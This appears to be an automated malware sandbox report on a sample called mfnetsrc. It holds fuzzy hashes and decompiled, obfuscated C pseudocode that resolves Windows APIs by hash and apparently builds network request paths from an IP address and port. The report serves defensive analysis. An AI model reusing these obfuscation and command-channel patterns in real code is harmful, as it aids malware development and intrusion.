Snapshot File: hcaresult_3_2_2aa0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: 79V#$79V#$79V#$>p$>p$Ei
API String ID: 2050909247-1771473519
Opcode ID: aec27f4563b16c0562c37c358e1f9051bb085fcb5778b84f6842b4692ab9995f
Instruction ID: 4c39f0d223f49622f14f79354544d944f57e46674827effcaf33644019c8e703
Opcode Fuzzy Hash: aec27f4563b16c0562c37c358e1f9051bb085fcb5778b84f6842b4692ab9995f
Instruction Fuzzy Hash: 0CA1B271B842029BCB24EBB495A062FB2E6AFC4744F54496AF485DB340EF74DD06CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 02AA9FC8, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E02AA9FC8(void* __eax, void* __ebx, void* __ebp, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36, char _a40, char _a44, intOrPtr _a48, char _a56, char _a576) {
				intOrPtr* _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t37;
				signed int _t38;
				intOrPtr* _t41;
				signed int _t44;
				intOrPtr* _t47;
				intOrPtr* _t49;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				intOrPtr* _t66;
				intOrPtr _t70;
				intOrPtr* _t71;
				intOrPtr* _t75;
				signed int _t76;
				signed int _t82;
				intOrPtr* _t95;
				intOrPtr _t98;
				char* _t100;
				intOrPtr _t101;
				intOrPtr _t134;
				intOrPtr* _t146;
				void* _t148;
				intOrPtr _t149;
				void* _t150;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t156;
				char* _t157;
				void* _t158;
				char _t161;
				intOrPtr _t165;
				void* _t166;
				void* _t170;
				void* _t171;

				_t37 = __eax;
				goto L3;
				do {
					while(1) {
						L3:
						_t170 = _t37 - 0x1bec2acf;
						if(_t170 > 0) {
							goto L41;
						}
						L4:
						if(_t170 == 0) {
							_t54 =  *0x2aadea8;
							__eflags = _t54;
							if(_t54 == 0) {
								_t100 = E02AA3F20(0xbb398380);
								_t54 = E02AA3E80(_t95, _t100, 0x97f883e, _t161);
								 *0x2aadea8 = _t54;
							}
							_t148 =  *_t54();
							_t56 =  *0x2aae1a0;
							__eflags = _t56;
							if(_t56 == 0) {
								_t100 = E02AA3F20(0xbb398380);
								_t56 = E02AA3E80(_t95, _t100, 0x26c3f343, _t161);
								 *0x2aae1a0 = _t56;
							}
							 *_t56(_t148, 0, _t95);
							_t149 = _a12;
							_t37 = 0x1dedf83c;
							continue;
						} else {
							_t171 = _t37 - 0x191840a9;
							if(_t171 > 0) {
								__eflags = _t37 - 0x1a29c84b;
								if(_t37 == 0x1a29c84b) {
									_t60 =  *0x2aadea8;
									__eflags = _t60;
									if(_t60 == 0) {
										_t100 = E02AA3F20(0xbb398380);
										_t60 = E02AA3E80(_t95, _t100, 0x97f883e, _t161);
										 *0x2aadea8 = _t60;
									}
									_t150 =  *_t60();
									_t62 =  *0x2aadcec;
									__eflags = _t62;
									if(_t62 == 0) {
										_t100 = E02AA3F20(0xbb398380);
										_t62 = E02AA3E80(_t95, _t100, 0xe9233692, _t161);
										 *0x2aadcec = _t62;
									}
									_t53 =  *_t62(_t150, 8, 0x48);
									_a16 = _t53;
									__eflags = _t53;
									if(_t53 == 0) {
										L59:
										return _t53;
									} else {
										_t149 = _a12;
										_t37 = 0x1fc710ef;
										continue;
									}
								} else {
									__eflags = _t37 - 0x1a44b2a5;
									if(_t37 != 0x1a44b2a5) {
										break;
									} else {
										_t157 = E02AA34C0(0x2aada50);
										_t66 =  *0x2aadc60;
										__eflags = _t66;
										if(_t66 == 0) {
											_t66 = E02AA3E80(_t95, E02AA3F20(0xe66945e6), 0xcca28b0d, _t161);
											 *0x2aadc60 = _t66;
										}
										 *_t66( &_a56, 0x104, _t157,  &_a576, _t95);
										_t166 = _t166 + 0x14;
										_t100 = _t157;
										E02AA3460(_t100);
										_t149 = _a24;
										_t37 = 0x10f8a433;
										continue;
									}
								}
							} else {
								if(_t171 == 0) {
									_t101 = _a28;
									 *((intOrPtr*)(_t101 + 0x24)) = _t149;
									_t70 =  *0x2aae2dc; // 0x0
									 *((intOrPtr*)(_t101 + 0x20)) = _t70;
									 *0x2aae2dc = _t101;
									return _t70;
								} else {
									if(_t37 == 0xa70e03e) {
										_t71 =  *0x2aadc70;
										__eflags = _t71;
										if(_t71 == 0) {
											_t100 = E02AA3F20(0xbb398380);
											_t71 = E02AA3E80(_t95, _t100, 0x560d239b, _t161);
											 *0x2aadc70 = _t71;
										}
										 *_t71(_a44);
										_t37 = 0x191840a9;
										continue;
									} else {
										if(_t37 == 0x10f8a433) {
											_push(0);
											_push(_t100);
											_t100 = 0;
											E02AA4BA0(_t95, 0,  &_a56, _t161, 1);
											_t166 = _t166 + 0xc;
											_t37 = 0x1bec2acf;
											continue;
										} else {
											if(_t37 != 0x18d473c5) {
												break;
											} else {
												_t154 =  *0x2aae2ec; // 0xdf7b30
												_t75 =  *0x2aae024;
												_t155 = _t154 + 0x278;
												_a48 = _t155;
												if(_t75 == 0) {
													_t100 = E02AA3F20(0xbb398380);
													_t75 = E02AA3E80(_t95, _t100, 0x5262aefc, _t161);
													 *0x2aae024 = _t75;
												}
												_t76 =  *_t75(_t155);
												_t156 =  *0x2aaded0;
												_a48 = 2 + _t76 * 2;
												if(_t156 == 0) {
													_t100 = E02AA3F20(0xbb398380);
													_t156 = E02AA3E80(_t95, _t100, 0x23563937, _t161);
													 *0x2aaded0 = _t156;
												}
												_t165 = _t156;
												if(_t156 == 0) {
													_t100 = E02AA3F20(0xbb398380);
													_t156 = E02AA3E80(_t95, _t100, 0x23563937, _t165);
													 *0x2aaded0 = _t156;
												}
												_t98 = _t156;
												if(_t156 == 0) {
													_t100 = E02AA3F20(0xbb398380);
													 *0x2aaded0 = E02AA3E80(_t98, _t100, 0x23563937, _t165);
												}
												_t146 =  *0x2aadce8; // 0x0
												if(_t146 == 0) {
													_t100 = E02AA3F20(0xbb398380);
													_t146 = E02AA3E80(_t98, _t100, 0xb310a228, _t165);
													 *0x2aadce8 = _t146;
												}
												_t82 =  *_t146(GetCurrentProcess(), GetCurrentProcess(), GetCurrentProcess(),  &_a40, 0x100000, 1, 0);
												_t149 = _v8;
												_t134 = _v12;
												asm("sbb eax, eax");
												_t37 = ( ~_t82 & 0x069deb97) + 0x1f9eb481;
												_t95 = _v0;
												L2:
												_t161 = _a36;
												while(1) {
													L3:
													_t170 = _t37 - 0x1bec2acf;
													if(_t170 > 0) {
														goto L41;
													}
													goto L4;
												}
												goto L41;
											}
										}
									}
								}
							}
						}
						L60:
						L41:
						__eflags = _t37 - 0x1fc710ef;
						if(__eflags > 0) {
							__eflags = _t37 - 0x263ca018;
							if(_t37 == 0x263ca018) {
								_t100 =  &_a44;
								_t38 = E02AAB3A0(_t100,  &_a36);
								asm("sbb eax, eax");
								_t37 = ( ~_t38 & 0x28f9ad68) + 0xa70e03e;
								goto L2;
							} else {
								__eflags = _t37 - 0x336a8da6;
								if(_t37 != 0x336a8da6) {
									break;
								} else {
									_t100 = _t161;
									_t41 = E02AA1140(_a40);
									_t134 = _a20;
									_t95 = _t41;
									__eflags = _t95;
									_a32 = _t95;
									_t37 =  !=  ? 0x1a44b2a5 : 0x1dedf83c;
									continue;
								}
							}
						} else {
							if(__eflags == 0) {
								_t100 = _t149;
								_t44 = E02AAAB50(_t100, _t134,  &_a576);
								_t134 = _a20;
								_t166 = _t166 + 4;
								asm("sbb eax, eax");
								_t37 = ( ~_t44 & 0xf935bf44) + 0x1f9eb481;
								continue;
							} else {
								__eflags = _t37 - 0x1dedf83c;
								if(_t37 == 0x1dedf83c) {
									_t47 =  *0x2aadea8;
									__eflags = _t47;
									if(_t47 == 0) {
										_t100 = E02AA3F20(0xbb398380);
										_t47 = E02AA3E80(_t95, _t100, 0x97f883e, _t161);
										 *0x2aadea8 = _t47;
									}
									_t158 =  *_t47();
									_t49 =  *0x2aae1a0;
									__eflags = _t49;
									if(_t49 == 0) {
										_t100 = E02AA3F20(0xbb398380);
										_t49 = E02AA3E80(_t95, _t100, 0x26c3f343, _t161);
										 *0x2aae1a0 = _t49;
									}
									 *_t49(_t158, 0, _t161);
									_t149 = _a12;
									_t37 = 0xa70e03e;
									_t134 = _a8;
									continue;
								} else {
									__eflags = _t37 - 0x1f9eb481;
									if(_t37 == 0x1f9eb481) {
										_t53 = E02AA4250(_t95, _a28);
										goto L59;
									} else {
										break;
									}
								}
							}
						}
						goto L60;
					}
					__eflags = _t37 - 0x1c40b504;
				} while (_t37 != 0x1c40b504);
				return _t37;
				goto L60;
			}

0x02aa9fc8
0x02aa9fc8
0x02aa9fd0
0x02aa9fd0
0x02aa9fd0
0x02aa9fd0
0x02aa9fd5
0x00000000
0x00000000
0x02aa9fdb
0x02aa9fdb
0x02aaa25f
0x02aaa264
0x02aaa266
0x02aaa277
0x02aaa279
0x02aaa27e
0x02aaa27e
0x02aaa285
0x02aaa287
0x02aaa28c
0x02aaa28e
0x02aaa29f
0x02aaa2a1
0x02aaa2a6
0x02aaa2a6
0x02aaa2af
0x02aaa2b1
0x02aaa2b5
0x00000000
0x02aa9fe1
0x02aa9fe1
0x02aa9fe6
0x02aaa17a
0x02aaa17f
0x02aaa1ee
0x02aaa1f3
0x02aaa1f5
0x02aaa206
0x02aaa208
0x02aaa20d
0x02aaa20d
0x02aaa214
0x02aaa216
0x02aaa21b
0x02aaa21d
0x02aaa22e
0x02aaa230
0x02aaa235
0x02aaa235
0x02aaa23f
0x02aaa241
0x02aaa245
0x02aaa247
0x02aaa40c
0x02aaa416
0x02aaa24d
0x02aaa24d
0x02aaa251
0x00000000
0x02aaa256
0x02aaa181
0x02aaa181
0x02aaa186
0x00000000
0x02aaa18c
0x02aaa196
0x02aaa198
0x02aaa19d
0x02aaa19f
0x02aaa1b2
0x02aaa1b7
0x02aaa1b7
0x02aaa1d0
0x02aaa1d2
0x02aaa1d5
0x02aaa1d7
0x02aaa1dc
0x02aaa1e0
0x00000000
0x02aaa1e5
0x02aaa186
0x02aa9fec
0x02aa9fec
0x02aaa3e3
0x02aaa3e7
0x02aaa3ea
0x02aaa3ef
0x02aaa3f2
0x02aaa402
0x02aa9ff2
0x02aa9ff7
0x02aaa142
0x02aaa147
0x02aaa149
0x02aaa15a
0x02aaa15c
0x02aaa161
0x02aaa161
0x02aaa16a
0x02aaa170
0x00000000
0x02aa9ffd
0x02aaa002
0x02aaa121
0x02aaa123
0x02aaa12a
0x02aaa12c
0x02aaa135
0x02aaa138
0x00000000
0x02aaa008
0x02aaa00d
0x00000000
0x02aaa013
0x02aaa013
0x02aaa019
0x02aaa01e
0x02aaa024
0x02aaa02a
0x02aaa03b
0x02aaa03d
0x02aaa042
0x02aaa042
0x02aaa048
0x02aaa04a
0x02aaa057
0x02aaa05d
0x02aaa06e
0x02aaa075
0x02aaa077
0x02aaa077
0x02aaa07d
0x02aaa081
0x02aaa092
0x02aaa099
0x02aaa09b
0x02aaa09b
0x02aaa0a1
0x02aaa0a5
0x02aaa0b6
0x02aaa0bf
0x02aaa0bf
0x02aaa0c5
0x02aaa0cd
0x02aaa0de
0x02aaa0e5
0x02aaa0e7
0x02aaa0e7
0x02aaa104
0x02aaa106
0x02aaa10c
0x02aaa110
0x02aaa117
0x02aa9fb9
0x02aa9fc2
0x02aa9fc2
0x02aa9fd0
0x02aa9fd0
0x02aa9fd0
0x02aa9fd5
0x00000000
0x00000000
0x00000000
0x02aa9fd5
0x00000000
0x02aa9fd0
0x02aaa00d
0x02aaa002
0x02aa9ff7
0x02aa9fec
0x02aa9fe6
0x00000000
0x02aaa2c3
0x02aaa2c3
0x02aaa2c8
0x02aaa389
0x02aaa38e
0x02aaa3c3
0x02aaa3c7
0x02aaa3d2
0x02aaa3d9
0x00000000
0x02aaa390
0x02aaa390
0x02aaa395
0x00000000
0x02aaa39b
0x02aaa39f
0x02aaa3a1
0x02aaa3a6
0x02aaa3aa
0x02aaa3ac
0x02aaa3ae
0x02aaa3b7
0x00000000
0x02aaa3b7
0x02aaa395
0x02aaa2ce
0x02aaa2ce
0x02aaa367
0x02aaa36a
0x02aaa36f
0x02aaa373
0x02aaa378
0x02aaa37f
0x00000000
0x02aaa2d4
0x02aaa2d4
0x02aaa2d9
0x02aaa2fc
0x02aaa301
0x02aaa303
0x02aaa314
0x02aaa316
0x02aaa31b
0x02aaa31b
0x02aaa322
0x02aaa324
0x02aaa329
0x02aaa32b
0x02aaa33c
0x02aaa33e
0x02aaa343
0x02aaa343
0x02aaa34c
0x02aaa34e
0x02aaa352
0x02aaa357
0x00000000
0x02aaa2db
0x02aaa2db
0x02aaa2e0
0x02aaa407
0x00000000
0x00000000
0x00000000
0x00000000
0x02aaa2e0
0x02aaa2d9
0x02aaa2ce
0x00000000
0x02aaa2c8
0x02aaa2e6
0x02aaa2e6
0x02aaa2fb
0x00000000

APIs

GetCurrentProcess.KERNEL32(?,00100000,00000001,00000000), ref: 02AAA0FB
GetCurrentProcess.KERNEL32(00000000), ref: 02AAA0FE
GetCurrentProcess.KERNEL32(00000000), ref: 02AAA101

Strings

79V#, xrefs: 02AAA08D
>p, xrefs: 02AA9FF2
79V#, xrefs: 02AAA0B1
79V#, xrefs: 02AAA069

Memory Dump Source

Source File: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Offset: 02AA0000, based on PE: true

Associated: 00000003.00000002.642881250.0000000002AA0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642908253.0000000002AAD000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.642924170.0000000002AB0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2aa0000_mfnetsrc.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: 79V#$79V#$79V#$>p
API String ID: 2050909247-2830606539
Opcode ID: 3c43ff700bf2e509afa9e3a8bed8b65e66ce087731787cc0e350ab58ff3da697
Instruction ID: 881060bda9ef6d954b89831b1babdeb77573ab9b50bbda49e3fe28c9c72fee05
Opcode Fuzzy Hash: 3c43ff700bf2e509afa9e3a8bed8b65e66ce087731787cc0e350ab58ff3da697
Instruction Fuzzy Hash: AD31E435E913129BCF209BA495A472E76E7AFC8B88F18085AE885DB351DF74DC018FD1

Uniqueness

Uniqueness Score: -1.00%

Function 02A314A0, Relevance: 12.2, APIs: 8, Instructions: 171COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 02A314DB
SetLastError.KERNEL32(0000007F), ref: 02A31507

Memory Dump Source

Source File: 00000003.00000002.642765849.0000000002A31000.00000020.00000001.sdmp, Offset: 02A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a31000_mfnetsrc.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: be621a70a4931fa4e5246d18b02c05e717e70e7098060f01e3f3507f754829d4
Instruction ID: 07c4d7c21a2fd16e1ecac6c17ba47c14ba0df1e369f4e4154b51de6776a8b175
Opcode Fuzzy Hash: be621a70a4931fa4e5246d18b02c05e717e70e7098060f01e3f3507f754829d4
Instruction Fuzzy Hash: F171C774E04109EFDB09DF94C981BADB7B2FF48304F248599E51AAB351DB74AA81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02AA12B0, Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 396
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E02AA12B0(char __ecx, signed int __edx, intOrPtr* _a4) {
				char _v2048;
				char _v2560;
				char _v2688;
				char _v2816;
				intOrPtr* _v2820;
				intOrPtr* _v2824;
				char _v2828;
				char _v2836;
				char _v2844;
				signed int _v2848;
				intOrPtr _v2852;
				void* _v2856;
				intOrPtr* _v2860;
				char _v2864;
				intOrPtr _v2868;
				char _v2872;
				intOrPtr* _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				char _v2892;
				intOrPtr* _v2896;
				intOrPtr _v2904;
				intOrPtr* _v2908;
				void* __ebx;
				void* __ebp;
				void* _t117;
				signed int _t118;
				void* _t121;
				intOrPtr _t127;
				intOrPtr* _t139;
				intOrPtr* _t141;
				signed int _t146;
				signed int _t154;
				intOrPtr* _t157;
				intOrPtr* _t159;
				signed int _t163;
				intOrPtr* _t174;
				signed int _t175;
				signed int _t178;
				intOrPtr* _t182;
				void* _t189;
				intOrPtr* _t191;
				intOrPtr* _t194;
				intOrPtr* _t196;
				intOrPtr _t199;
				char _t241;
				signed char* _t243;
				signed int _t263;
				short* _t265;
				void* _t266;
				short* _t267;
				void* _t268;
				void* _t269;
				intOrPtr _t270;
				signed int _t273;
				intOrPtr* _t274;
				void* _t276;
				void* _t277;
				intOrPtr* _t278;
				void* _t280;
				void* _t282;
				void* _t283;
				void* _t284;

				_t280 =  &_v2896;
				_t278 = _v2864;
				_t263 = __edx;
				_v2888 = 0;
				_t241 = __ecx;
				_v2884 = __edx;
				_t196 = _v2860;
				_t117 = 0xa52ba2c;
				_v2892 = __ecx;
				_v2896 = _t196;
				_v2876 = _t278;
				while(1) {
					L1:
					_t191 = _a4;
					goto L2;
					do {
						while(1) {
							L2:
							_t282 = _t117 - 0x1a712fee;
							if(_t282 > 0) {
								break;
							}
							if(_t282 == 0) {
								_t157 =  *0x2aadea8;
								__eflags = _t157;
								if(_t157 == 0) {
									_t157 = E02AA3E80(_t191, E02AA3F20(0xbb398380), 0x97f883e, _t278);
									 *0x2aadea8 = _t157;
								}
								_t268 =  *_t157();
								_t159 =  *0x2aae1a0;
								__eflags = _t159;
								if(_t159 == 0) {
									_t159 = E02AA3E80(_t191, E02AA3F20(0xbb398380), 0x26c3f343, _t278);
									 *0x2aae1a0 = _t159;
								}
								 *_t159(_t268, 0, _v2844);
								_t196 = _v2908;
								_t117 = 0xa9569d6;
								_t241 = _v2904;
								continue;
							} else {
								_t283 = _t117 - 0xa52ba2c;
								if(_t283 > 0) {
									__eflags = _t117 - 0x1194a5ec;
									if(__eflags > 0) {
										__eflags = _t117 - 0x1947423a;
										if(_t117 != 0x1947423a) {
											goto L28;
										} else {
											_t163 = E02AA1FB0( &_v2872,  &_v2856);
											_t196 = _v2896;
											_t241 = _v2892;
											asm("sbb eax, eax");
											_t117 = ( ~_t163 & 0xd3a4a493) + 0x2ec7d52f;
											continue;
										}
									} else {
										if(__eflags == 0) {
											_t265 =  &_v2560;
											_t194 = _v2880 - (0xaaaaaaab * _v2880 >> 0x20 >> 2) + (0xaaaaaaab * _v2880 >> 0x20 >> 2) * 2 + (0xaaaaaaab * _v2880 >> 0x20 >> 2) + (0xaaaaaaab * _v2880 >> 0x20 >> 2) * 2 + 1;
											__eflags = _t194;
											if(_t194 != 0) {
												do {
													_t273 = (_v2880 & 0x0000000f) + 4;
													E02AA4ED0(_t265, _t273,  &_v2880);
													_t267 = _t265 + _t273 * 2;
													_t280 = _t280 + 4;
													 *_t267 = 0x2f;
													_t265 = _t267 + 2;
													_t194 = _t194 - 1;
													__eflags = _t194;
												} while (_t194 != 0);
												_t278 = _v2876;
												_t196 = _v2896;
											}
											_t241 = _v2892;
											 *_t265 = 0;
											_t117 = 0x26613761;
											_t263 = _v2884;
											goto L1;
										} else {
											__eflags = _t117 - 0xa9569d6;
											if(_t117 == 0xa9569d6) {
												E02AA4250(_t191, _v2864);
												_t196 = _v2896;
												_t117 = 0xc5127ed;
												_t241 = _v2892;
												continue;
											} else {
												__eflags = _t117 - 0xc5127ed;
												if(_t117 == 0xc5127ed) {
													L69:
													E02AA4250(_t191, _t278);
													L70:
													return _v2888;
												} else {
													goto L28;
												}
											}
										}
									}
								} else {
									if(_t283 == 0) {
										_t174 =  *0x2aadd4c;
										__eflags = _t174;
										if(_t174 == 0) {
											_t174 = E02AA3E80(_t191, E02AA3F20(0xbb398380), 0xae3c1a47, _t278);
											 *0x2aadd4c = _t174;
										}
										_t175 =  *_t174();
										_t196 = _v2896;
										_t241 = _v2892;
										_v2880 = _t175;
										_t117 = 0x38f41d46;
										continue;
									} else {
										_t284 = _t117 - 0x3354cb2;
										if(_t284 > 0) {
											__eflags = _t117 - 0x8f8b881;
											if(_t117 != 0x8f8b881) {
												goto L28;
											} else {
												_t178 = E02AA1950( &_v2844,  &_v2688,  &_v2836);
												_t196 = _v2896;
												_t280 = _t280 + 4;
												_t241 = _v2892;
												asm("sbb eax, eax");
												_t117 = ( ~_t178 & 0x0c54f09a) + 0x1a712fee;
												continue;
											}
										} else {
											if(_t284 == 0) {
												_t269 = E02AA34C0(0x2aad0e0);
												_t182 =  *0x2aadc60;
												__eflags = _t182;
												if(_t182 == 0) {
													_t182 = E02AA3E80(_t191, E02AA3F20(0xe66945e6), 0xcca28b0d, _t278);
													 *0x2aadc60 = _t182;
												}
												 *_t182( &_v2048, 0x400, _t269,  &_v2816,  &_v2688);
												_t280 = _t280 + 0x14;
												E02AA3460(_t269);
												_t196 = _v2896;
												_t117 = 0x8f8b881;
												_t241 = _v2892;
												continue;
											} else {
												if(_t117 == 0xe50069) {
													E02AA4250(_t191, _v2856);
													_t196 = _v2896;
													_t117 = 0x2ec7d52f;
													_t241 = _v2892;
													continue;
												} else {
													if(_t117 != 0x26c79c2) {
														goto L28;
													} else {
														 *((intOrPtr*)(_t191 + 4)) =  *_v2856;
														_t270 = E02AA42F0(_t191,  *_v2856);
														 *_t191 = _t270;
														if(_t270 != 0) {
															_push( *((intOrPtr*)(_t191 + 4)));
															_push(_t270);
															_t189 = E02AA57E0(_v2852 - 4);
															_t280 = _t280 + 8;
															asm("sbb edi, edi");
															_v2888 =  ~_t263;
															if(0 == _t189) {
																E02AA4250(_t191,  *_t191);
															}
															_t263 = _v2884;
														}
														_t196 = _v2896;
														_t117 = 0xe50069;
														_t241 = _v2892;
														continue;
													}
												}
											}
										}
									}
								}
							}
							L71:
						}
						__eflags = _t117 - 0x2ec7d52f;
						if(__eflags > 0) {
							__eflags = _t117 - 0x310afd51;
							if(_t117 == 0x310afd51) {
								_v2828 = _t241;
								_v2820 = _t196;
								_v2824 = _t278;
								_t118 = E02AA1E60( &_v2828,  &_v2864);
								_t196 = _v2896;
								_t241 = _v2892;
								asm("sbb eax, eax");
								_t117 = ( ~_t118 & 0x1deeb958) + 0xc5127ed;
								goto L2;
							} else {
								__eflags = _t117 - 0x3380dca7;
								if(_t117 == 0x3380dca7) {
									_t121 = E02AA34C0(0x2aad080);
									_t274 =  *0x2aadc60;
									_t266 = _t121;
									__eflags = _t274;
									if(_t274 == 0) {
										_t274 = E02AA3E80(_t191, E02AA3F20(0xe66945e6), 0xcca28b0d, _t278);
										 *0x2aadc60 = _t274;
									}
									_t199 =  *0x2aae2e0; // 0xdf08f8
									_t243 =  *(_t199 + 0xc);
									 *_t274( &_v2816, 0x40, _t266, _t243[3] & 0x000000ff, _t243[2] & 0x000000ff, _t243[1] & 0x000000ff,  *_t243 & 0x000000ff);
									_t280 = _t280 + 0x1c;
									E02AA3460(_t266);
									_t127 =  *0x2aae2e0; // 0xdf08f8
									_t196 = _v2896;
									_t263 = _v2884;
									_t241 = _v2892;
									_v2848 =  *( *((intOrPtr*)(_t127 + 0xc)) + 4) & 0x0000ffff;
									_t117 = 0x1194a5ec;
									goto L2;
								} else {
									__eflags = _t117 - 0x38f41d46;
									if(_t117 != 0x38f41d46) {
										goto L28;
									} else {
										_t276 =  *(_t263 + 4) + (0x51eb851f *  *(_t263 + 4) >> 0x20 >> 5) * 4 + (0x51eb851f *  *(_t263 + 4) >> 0x20 >> 5);
										_t278 = E02AA42F0(_t191, _t276);
										_v2876 = _t278;
										__eflags = _t278;
										if(_t278 == 0) {
											goto L70;
										} else {
											_push(_t276);
											_push(_t278);
											_t196 = E02AA5BC0( *_t263,  *(_t263 + 4), _t278);
											_t280 = _t280 + 8;
											_v2896 = _t196;
											__eflags = _t196;
											if(_t196 == 0) {
												goto L69;
											} else {
												_t241 = _v2892;
												_t117 = 0x310afd51;
												goto L2;
											}
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t139 =  *0x2aadea8;
								__eflags = _t139;
								if(_t139 == 0) {
									_t139 = E02AA3E80(_t191, E02AA3F20(0xbb398380), 0x97f883e, _t278);
									 *0x2aadea8 = _t139;
								}
								_t277 =  *_t139();
								_t141 =  *0x2aae1a0;
								__eflags = _t141;
								if(_t141 == 0) {
									_t141 = E02AA3E80(_t191, E02AA3F20(0xbb398380), 0x26c3f343, _t278);
									 *0x2aae1a0 = _t141;
								}
								 *_t141(_t277, 0, _v2872);
								_t196 = _v2908;
								_t117 = 0x2be07bd7;
								_t241 = _v2904;
								goto L2;
							} else {
								__eflags = _t117 - 0x2a3fe145;
								if(__eflags > 0) {
									__eflags = _t117 - 0x2be07bd7;
									if(_t117 != 0x2be07bd7) {
										goto L28;
									} else {
										E02AA4250(_t191, _v2836);
										_t196 = _v2896;
										_t117 = 0x1a712fee;
										_t241 = _v2892;
										goto L2;
									}
								} else {
									if(__eflags == 0) {
										_t146 = E02AA2290( &_v2864,  &_v2844);
										_t196 = _v2896;
										_t241 = _v2892;
										asm("sbb eax, eax");
										_t117 = ( ~_t146 & 0x28eb72d1) + 0xa9569d6;
										goto L2;
									} else {
										__eflags = _t117 - 0x26613761;
										if(_t117 == 0x26613761) {
											E02AA1C70( &_v2688);
											_t196 = _v2896;
											_t117 = 0x3354cb2;
											_t241 = _v2892;
											goto L2;
										} else {
											__eflags = _t117 - 0x26c62088;
											if(_t117 != 0x26c62088) {
												goto L28;
											} else {
												_push( &_v2872);
												_v2872 = 0;
												_push( &_v2836);
												_v2868 = 0;
												_push( &_v2048);
												_push( &_v2560);
												_t154 = E02AA2C20( &_v2816, _v2848);
												_t196 = _v2896;
												_t280 = _t280 + 0x10;
												_t241 = _v2892;
												asm("sbb eax, eax");
												_t117 = ( ~_t154 & 0xed66c663) + 0x2be07bd7;
												goto L2;
											}
										}
									}
								}
							}
						}
						goto L71;
						L28:
						__eflags = _t117 - 0x33f32524;
					} while (_t117 != 0x33f32524);
					return _v2888;
					goto L71;
				}
			}

0x02aa12b0
0x02aa12b8
0x02aa12c0
0x02aa12c2
0x02aa12c6
0x02aa12c8
0x02aa12cc
0x02aa12d0
0x02aa12d5
0x02aa12d9
0x02aa12dd
0x02aa12e1
0x02aa12e1
0x02aa12e1
0x02aa12e8
0x02aa12f0
0x02aa12f0
0x02aa12f0
0x02aa12f0
0x02aa12f5
0x00000000
0x00000000
0x02aa12fb
0x02aa1589
0x02aa158e
0x02aa1590
0x02aa15a3
0x02aa15a8
0x02aa15a8
0x02aa15af
0x02aa15b1
0x02aa15b6
0x02aa15b8
0x02aa15cb
0x02aa15d0
0x02aa15d0
0x02aa15dc
0x02aa15de
0x02aa15e2
0x02aa15e7
0x00000000
0x02aa1301
0x02aa1301
0x02aa1306
0x02aa148e
0x02aa1493
0x02aa1556
0x02aa155b
0x00000000
0x02aa1561
0x02aa1569
0x02aa156e
0x02aa1574
0x02aa1578
0x02aa157f
0x00000000
0x02aa157f
0x02aa1499
0x02aa1499
0x02aa14e6
0x02aa14fe
0x02aa14fe
0x02aa14ff
0x02aa1510
0x02aa151d
0x02aa1523
0x02aa1528
0x02aa152b
0x02aa152e
0x02aa1531
0x02aa1534
0x02aa1534
0x02aa1534
0x02aa1537
0x02aa153b
0x02aa153b
0x02aa153f
0x02aa1545
0x02aa1548
0x02aa154d
0x00000000
0x02aa149b
0x02aa149b
0x02aa14a0
0x02aa14cb
0x02aa14d0
0x02aa14d4
0x02aa14d9
0x00000000
0x02aa14a2
0x02aa14a2
0x02aa14a7
0x02aa1879
0x02aa187b
0x02aa1880
0x02aa188e
0x00000000
0x00000000
0x00000000
0x02aa14a7
0x02aa14a0
0x02aa1499
0x02aa130c
0x02aa130c
0x02aa1452
0x02aa1457
0x02aa1459
0x02aa146c
0x02aa1471
0x02aa1471
0x02aa1476
0x02aa1478
0x02aa147c
0x02aa1480
0x02aa1484
0x00000000
0x02aa1312
0x02aa1312
0x02aa1317
0x02aa1414
0x02aa1419
0x00000000
0x02aa141f
0x02aa142f
0x02aa1434
0x02aa1438
0x02aa143b
0x02aa1441
0x02aa1448
0x00000000
0x02aa1448
0x02aa131d
0x02aa131d
0x02aa13b5
0x02aa13b7
0x02aa13bc
0x02aa13be
0x02aa13d1
0x02aa13d6
0x02aa13d6
0x02aa13f6
0x02aa13f8
0x02aa13fd
0x02aa1402
0x02aa1406
0x02aa140b
0x00000000
0x02aa1323
0x02aa1328
0x02aa1394
0x02aa1399
0x02aa139d
0x02aa13a2
0x00000000
0x02aa132a
0x02aa132f
0x00000000
0x02aa1335
0x02aa133b
0x02aa1343
0x02aa1345
0x02aa1349
0x02aa1353
0x02aa135c
0x02aa135d
0x02aa1364
0x02aa1369
0x02aa136d
0x02aa1371
0x02aa1375
0x02aa1375
0x02aa137a
0x02aa137a
0x02aa137e
0x02aa1382
0x02aa1387
0x00000000
0x02aa1387
0x02aa132f
0x02aa1328
0x02aa131d
0x02aa1317
0x02aa130c
0x02aa1306
0x00000000
0x02aa12fb
0x02aa15f0
0x02aa15f5
0x02aa174c
0x02aa1751
0x02aa1845
0x02aa184d
0x02aa1855
0x02aa1859
0x02aa185e
0x02aa1864
0x02aa1868
0x02aa186f
0x00000000
0x02aa1757
0x02aa1757
0x02aa175c
0x02aa17c0
0x02aa17c5
0x02aa17cb
0x02aa17cd
0x02aa17cf
0x02aa17e7
0x02aa17e9
0x02aa17e9
0x02aa17ef
0x02aa17f5
0x02aa1813
0x02aa1815
